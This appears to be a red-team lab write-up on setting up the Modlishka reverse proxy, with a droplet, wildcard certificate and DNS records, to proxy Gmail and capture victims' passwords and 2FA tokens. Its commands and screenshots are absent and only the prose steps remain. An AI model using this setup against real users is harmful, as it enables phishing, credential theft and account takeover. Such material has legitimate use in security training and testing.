Phishing with Modlishka Reverse HTTP Proxy
This lab shows how to setup a reverse HTTP proxy Modlishka
that can be used in phishing campaigns to steal user passwords and 2FA tokens. Modlishka makes this possible, because it sits in the middle between the website you as an attacker are impersonating and the victim (MITM) while recording all the traffic/tokens/passwords that traverse it.
Setup
Let's start off by building a new DigitalOcean droplet, the smallest is more than enough:
Once logged on, install certbot and download modlishka binary itself:
Modlishka Configuration
Let's create a configuration file for modlishka:
Wildcard Certificates
Important - let's generate a wildcard certificate for my domain I want my phishing victims to land on *.redteam.me
:
This will generate a challenge code as shown below:
We need to create a DNS TXT record in the DNS management console for redteam.me, which in my case is in Digital Ocean:
Once the DNS TXT record is created, continue with the certificate generation:
Once certificates are generated, we need to convert them to a format suitable to be embedded into JSON objects:
Once that is done, copy over the contents of the certs into the config - fullchain.pem
into the cert
and privkey.pem
into the certKey
:
More DNS Records
Let's create an A record for the root host @
that simply points to the droplet's IP:
This is very important - we need a CNAME
record for any host/subdomain *
pointing to @
Launching Modlishka
We are now ready to start the test by launching modlishka and giving it the modlishka.json config file:
Below shows how by visiting a redteam.me, I get presented with contents of gmail.com - indicating that Modlishka and the MITM works. Again, it is important to call it out - we did not create any copies or templates of the targeted website - the victim is actually browsing gmail, it's just that it is being served through Modlishka where the traffic is inspected and passwords are captured:
References
Last updated